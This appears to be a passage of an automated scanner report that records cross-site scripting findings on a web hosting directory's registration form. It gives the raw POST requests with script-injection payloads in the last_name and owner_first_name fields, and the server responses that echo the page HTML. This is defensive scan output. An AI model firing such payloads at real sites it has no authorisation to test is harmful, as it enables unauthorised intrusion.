src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
Smith
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
netsparker@example.com
expire_date
POST
3
first_name
POST
Smith
last_name
POST
'"--></style></script><script>alert(0x001CE2)</script>
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 579 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith©_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CE2)%3c%2fscript%3e&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:50:28 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='325A5101EE3560731249FB14E3673374C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='325A5101EE356073BF9B9DC04BE837866F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='325A5101EE356073C394A632D9377444C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE3560731A9E286A6CC9087BC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='325A5101EE356073FD7C1B7CD9621D406F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='325A5101EE35607376714EAD74631C9BC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='325A5101EE3560733B5BB07885FA571AC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='325A5101EE356073B9C6F270B96027BF6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='325A5101EE356073D93BDAA77DDE28FAC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='325A5101EE356073FEEEE67A726B30ED6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option value='325A5101EE356073057AD5F6FF7D2596C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='325A5101EE3560733C4A32B4117BC344C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='325A5101EE356073B7BBCDCEDCA0DCAAC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE356073599E7B5319C5B119C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='325A5101EE356073F2CC7DDE3AEF24A2C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='325A5101EE3560736DA8A7B5DC362788C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='325A5101EE356073D131797A7D806AAB6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='325A5101EE35607393A32FD231FE228E6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='325A5101EE35607312AC041CE21E79046F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
Smith
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
netsparker@example.com
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
'"--></style></script><script>alert(0x001CE3)</script>
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 579 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith©_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CE3)%3c%2fscript%3e&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:50:31 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='325A5101EE35607307E8CE23B2E90A91C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='325A5101EE356073592BD37523D41FEA6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='325A5101EE3560732C27DA94B3C3B1B8C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE356073340EA7B2BC8A22B8C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='325A5101EE35607341C8730B9C86CA8B6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='325A5101EE356073830D23986393E080C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='325A5101EE356073BA5E0588C57F7A39C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='325A5101EE356073F7E91C57F9D527D06F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='325A5101EE35607381867230C614D80BC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='325A5101EE3560733AA9ACBA7051BF106F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option value='325A5101EE3560738F008AC94083CF61C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='325A5101EE35607385BE4CD0AF744F08C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='325A5101EE35607302C95BA9792B54A5C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE356073C5DEC01153508375C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='325A5101EE3560734D064D4D53154948C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='325A5101EE35607344A3C63D75A7293FC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant 